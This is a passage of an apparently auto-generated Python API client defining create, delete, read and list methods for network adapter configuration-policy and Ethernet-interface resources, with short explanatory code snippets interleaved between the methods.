This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_adapter_config_policy(adapter_config_policy, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param AdapterConfigPolicy adapter_config_policy: The 'adapter.ConfigPolicy' resource to create. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: AdapterConfigPolicy
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_adapter_config_policy_with_http_info(
adapter_config_policy, **kwargs) # noqa: E501
def create_adapter_config_policy_with_http_info(self,
adapter_config_policy,
**kwargs): # noqa: E501
"""Create a 'adapter.ConfigPolicy' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_adapter_config_policy_with_http_info(adapter_config_policy, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param AdapterConfigPolicy adapter_config_policy: The 'adapter.ConfigPolicy' resource to create. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(AdapterConfigPolicy, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['adapter_config_policy'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError("Got an unexpected keyword argument '%s'"
" to method create_adapter_config_policy" %
key)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'adapter_config_policy' is set
if self.api_client.client_side_validation and (
'adapter_config_policy' not in local_var_params
or # noqa: E501
local_var_params['adapter_config_policy'] is None
): # noqa: E501
raise ApiValueError(
"Missing the required parameter `adapter_config_policy` when calling `create_adapter_config_policy`"
) # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'adapter_config_policy' in local_var_params:
body_params = local_var_params['adapter_config_policy']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params[
'Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/adapter/ConfigPolicies',
'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AdapterConfigPolicy', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
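Every generated method above repeats the same keyword-argument check before building the request. Stripped of the client plumbing, the idiom amounts to the following (`validate_call_kwargs` is an illustrative name, not part of the generated client):

```python
def validate_call_kwargs(method_name, all_params, kwargs):
    # Reject any keyword argument the generated method does not declare,
    # mirroring the ApiTypeError raised by the client methods above.
    for key in kwargs:
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s' to method %s"
                % (key, method_name))
    return dict(kwargs)

all_params = ['adapter_config_policy', 'async_req',
              '_return_http_data_only', '_preload_content', '_request_timeout']
ok = validate_call_kwargs('create_adapter_config_policy', all_params,
                          {'async_req': True})

caught = None
try:
    validate_call_kwargs('create_adapter_config_policy', all_params, {'bogus': 1})
except TypeError as exc:
    caught = str(exc)
```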
def delete_adapter_config_policy(self, moid, **kwargs): # noqa: E501
"""Delete a 'adapter.ConfigPolicy' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_adapter_config_policy(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_adapter_config_policy_with_http_info(
moid, **kwargs) # noqa: E501
def delete_adapter_config_policy_with_http_info(self, moid,
**kwargs): # noqa: E501
"""Delete a 'adapter.ConfigPolicy' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_adapter_config_policy_with_http_info(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['moid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError("Got an unexpected keyword argument '%s'"
" to method delete_adapter_config_policy" %
key)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'moid' is set
if self.api_client.client_side_validation and (
'moid' not in local_var_params or # noqa: E501
local_var_params['moid'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `moid` when calling `delete_adapter_config_policy`"
) # noqa: E501
collection_formats = {}
path_params = {}
if 'moid' in local_var_params:
path_params['Moid'] = local_var_params['moid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/adapter/ConfigPolicies/{Moid}',
'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
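Each `*_with_http_info` method begins by rejecting unknown keyword arguments before any request is built. A standalone sketch of that validation pattern (hypothetical helper, not part of the SDK; the real method raises `ApiTypeError` and then delegates to `api_client.call_api`):

```python
# Hypothetical, simplified version of the kwarg screening done above:
# any keyword outside the allowed set raises before a request is made.
def validate_kwargs(allowed, **kwargs):
    for key in kwargs:
        if key not in allowed:
            raise TypeError(
                "Got an unexpected keyword argument '%s'" % key)
    return kwargs

allowed = {'moid', 'async_req', '_return_http_data_only',
           '_preload_content', '_request_timeout'}
# Valid call: everything passes through unchanged.
params = validate_kwargs(allowed, moid='12345', async_req=True)
```

This fail-fast check is why a typo such as `asyncreq=True` surfaces as an immediate error rather than being silently ignored.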
def get_adapter_config_policy_by_moid(self, moid, **kwargs): # noqa: E501
"""Read a 'adapter.ConfigPolicy' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_config_policy_by_moid(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: AdapterConfigPolicy
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_adapter_config_policy_by_moid_with_http_info(
moid, **kwargs) # noqa: E501
def get_adapter_config_policy_by_moid_with_http_info(
self, moid, **kwargs): # noqa: E501
"""Read a 'adapter.ConfigPolicy' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_config_policy_by_moid_with_http_info(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _return_http_data_only: return response data only, without
the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(AdapterConfigPolicy, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['moid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_adapter_config_policy_by_moid" % key)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'moid' is set
if self.api_client.client_side_validation and (
'moid' not in local_var_params or # noqa: E501
local_var_params['moid'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `moid` when calling `get_adapter_config_policy_by_moid`"
) # noqa: E501
collection_formats = {}
path_params = {}
if 'moid' in local_var_params:
path_params['Moid'] = local_var_params['moid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/adapter/ConfigPolicies/{Moid}',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AdapterConfigPolicy', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
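The `>>> thread = api.get_...(moid, async_req=True)` / `>>> result = thread.get()` pattern in the docstrings can be sketched without touching the network. Assuming (as in openapi-generator clients generally) that `async_req=True` dispatches the call on a thread pool and hands back an `AsyncResult`, `fake_get` below is a stand-in for the actual HTTP call:

```python
from multiprocessing.pool import ThreadPool

# Stand-in for the real HTTP request the SDK would make.
def fake_get(moid):
    return {'Moid': moid, 'ObjectType': 'adapter.ConfigPolicy'}

pool = ThreadPool(processes=1)
# With async_req=True the SDK returns an object like this AsyncResult...
thread = pool.apply_async(fake_get, ('12345',))
# ...and .get() blocks until the worker thread has the response.
result = thread.get()
pool.close()
pool.join()
```

The synchronous form is simply the same call without the pool indirection.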
def get_adapter_config_policy_list(self, **kwargs): # noqa: E501
"""Read a 'adapter.ConfigPolicy' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_config_policy_list(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: AdapterConfigPolicyList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_adapter_config_policy_list_with_http_info(
**kwargs) # noqa: E501
def get_adapter_config_policy_list_with_http_info(self,
**kwargs): # noqa: E501
"""Read a 'adapter.ConfigPolicy' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_config_policy_list_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _return_http_data_only: return response data only, without
the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(AdapterConfigPolicyList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'filter', 'orderby', 'top', 'skip', 'select', 'expand', 'apply',
'count', 'inlinecount', 'at'
] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_adapter_config_policy_list" % key)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'filter' in local_var_params and local_var_params[
'filter'] is not None: # noqa: E501
query_params.append(
('$filter', local_var_params['filter'])) # noqa: E501
if 'orderby' in local_var_params and local_var_params[
'orderby'] is not None: # noqa: E501
query_params.append(
('$orderby', local_var_params['orderby'])) # noqa: E501
if 'top' in local_var_params and local_var_params[
'top'] is not None: # noqa: E501
query_params.append(
('$top', local_var_params['top'])) # noqa: E501
if 'skip' in local_var_params and local_var_params[
'skip'] is not None: # noqa: E501
query_params.append(
('$skip', local_var_params['skip'])) # noqa: E501
if 'select' in local_var_params and local_var_params[
'select'] is not None: # noqa: E501
query_params.append(
('$select', local_var_params['select'])) # noqa: E501
if 'expand' in local_var_params and local_var_params[
'expand'] is not None: # noqa: E501
query_params.append(
('$expand', local_var_params['expand'])) # noqa: E501
if 'apply' in local_var_params and local_var_params[
'apply'] is not None: # noqa: E501
query_params.append(
('$apply', local_var_params['apply'])) # noqa: E501
if 'count' in local_var_params and local_var_params[
'count'] is not None: # noqa: E501
query_params.append(
('$count', local_var_params['count'])) # noqa: E501
if 'inlinecount' in local_var_params and local_var_params[
'inlinecount'] is not None: # noqa: E501
query_params.append(
('$inlinecount',
local_var_params['inlinecount'])) # noqa: E501
if 'at' in local_var_params and local_var_params[
'at'] is not None: # noqa: E501
query_params.append(('at', local_var_params['at'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/adapter/ConfigPolicies',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AdapterConfigPolicyList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
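The list method above collects the OData-style options (`$filter`, `$top`, `$select`, ...) into `(name, value)` tuples. A minimal sketch of how those tuples end up on the wire, with illustrative values only:

```python
from urllib.parse import urlencode

# Tuples shaped like the query_params list built above; the values
# here are made up for illustration.
query_params = [
    ('$filter', "Parent.Moid eq '5cc0'"),
    ('$top', 10),
    ('$select', 'Moid'),
]
# Percent-encodes names and values ('$' becomes '%24') and joins
# the pairs with '&' to form the request's query string.
query_string = urlencode(query_params)
```

Using a list of tuples rather than a dict preserves parameter order and permits repeated keys, which is why the generated code appends tuples instead of assigning dict entries.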
def get_adapter_ext_eth_interface_by_moid(self, moid,
**kwargs): # noqa: E501
"""Read a 'adapter.ExtEthInterface' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_ext_eth_interface_by_moid(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: AdapterExtEthInterface
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_adapter_ext_eth_interface_by_moid_with_http_info(
moid, **kwargs) # noqa: E501
def get_adapter_ext_eth_interface_by_moid_with_http_info(
self, moid, **kwargs): # noqa: E501
"""Read a 'adapter.ExtEthInterface' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_ext_eth_interface_by_moid_with_http_info(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _return_http_data_only: return response data only, without
the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(AdapterExtEthInterface, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['moid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_adapter_ext_eth_interface_by_moid" % key)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'moid' is set
if self.api_client.client_side_validation and (
'moid' not in local_var_params or # noqa: E501
local_var_params['moid'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `moid` when calling `get_adapter_ext_eth_interface_by_moid`"
) # noqa: E501
collection_formats = {}
path_params = {}
if 'moid' in local_var_params:
path_params['Moid'] = local_var_params['moid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/adapter/ExtEthInterfaces/{Moid}',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AdapterExtEthInterface', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_adapter_ext_eth_interface_list(self, **kwargs): # noqa: E501
"""Read a 'adapter.ExtEthInterface' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_ext_eth_interface_list(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: AdapterExtEthInterfaceList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_adapter_ext_eth_interface_list_with_http_info(
**kwargs) # noqa: E501
def get_adapter_ext_eth_interface_list_with_http_info(
self, **kwargs): # noqa: E501
"""Read a 'adapter.ExtEthInterface' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_ext_eth_interface_list_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _return_http_data_only: return response data only, without
the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(AdapterExtEthInterfaceList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'filter', 'orderby', 'top', 'skip', 'select', 'expand', 'apply',
'count', 'inlinecount', 'at'
] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_adapter_ext_eth_interface_list" % key)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'filter' in local_var_params and local_var_params[
'filter'] is not None: # noqa: E501
query_params.append(
('$filter', local_var_params['filter'])) # noqa: E501
if 'orderby' in local_var_params and local_var_params[
'orderby'] is not None: # noqa: E501
query_params.append(
('$orderby', local_var_params['orderby'])) # noqa: E501
if 'top' in local_var_params and local_var_params[
'top'] is not None: # noqa: E501
query_params.append(
('$top', local_var_params['top'])) # noqa: E501
if 'skip' in local_var_params and local_var_params[
'skip'] is not None: # noqa: E501
query_params.append(
('$skip', local_var_params['skip'])) # noqa: E501
if 'select' in local_var_params and local_var_params[
'select'] is not None: # noqa: E501
query_params.append(
('$select', local_var_params['select'])) # noqa: E501
if 'expand' in local_var_params and local_var_params[
'expand'] is not None: # noqa: E501
query_params.append(
('$expand', local_var_params['expand'])) # noqa: E501
if 'apply' in local_var_params and local_var_params[
'apply'] is not None: # noqa: E501
query_params.append(
('$apply', local_var_params['apply'])) # noqa: E501
if 'count' in local_var_params and local_var_params[
'count'] is not None: # noqa: E501
query_params.append(
('$count', local_var_params['count'])) # noqa: E501
if 'inlinecount' in local_var_params and local_var_params[
